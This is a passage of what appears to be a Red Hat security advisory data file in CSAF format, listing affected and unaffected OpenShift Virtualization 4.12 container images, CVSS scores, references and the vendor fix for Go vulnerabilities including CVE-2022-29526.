"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "golang: encoding/xml: stack exhaustion in Decoder.Skip", }, { acknowledgments: [ { names: [ "Joël Gähwiler", ], summary: "Acknowledged by upstream.", }, ], cve: "CVE-2022-29526", cwe: { id: "CWE-280", name: "Improper Handling of Insufficient Permissions or Privileges ", }, discovery_date: "2022-05-11T00:00:00+00:00", flags: [ { label: "vulnerable_code_not_present", product_ids: [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2084085", }, ], notes: [ { category: "description", text: "A flaw was found in the syscall.Faccessat function when calling a process by checking the group. This flaw allows an attacker to check the process group permissions rather than a member of the file's group, affecting system availability.", title: "Vulnerability description", }, { category: "summary", text: "golang: syscall: faccessat checks wrong group", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", ], known_not_affected: [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2022-29526", }, { category: "external", summary: "RHBZ#2084085", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2084085", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2022-29526", url: "https://www.cve.org/CVERecord?id=CVE-2022-29526", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2022-29526", url: "https://nvd.nist.gov/vuln/detail/CVE-2022-29526", }, { category: "external", summary: "https://groups.google.com/g/golang-announce/c/Y5qrqw_lWdU", url: "https://groups.google.com/g/golang-announce/c/Y5qrqw_lWdU", }, ], release_date: "2022-05-11T00:00:00+00:00", remediations: [ { category: "vendor_fix", date: "2023-01-25T11:11:29+00:00", details: "Before applying this update, you must apply all previously released errata\nrelevant to your system.\n\nTo apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2023:0408", }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "LOCAL", availabilityImpact: "HIGH", baseScore: 6.2, baseSeverity: "MEDIUM", confidentialityImpact: "NONE", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", version: "3.1", }, products: [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "golang: syscall: faccessat checks wrong group", }, { cve: "CVE-2022-30629", cwe: { id: "CWE-331", name: "Insufficient Entropy", }, discovery_date: "2022-06-02T00:00:00+00:00", flags: [ { label: "vulnerable_code_not_present", product_ids: [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", 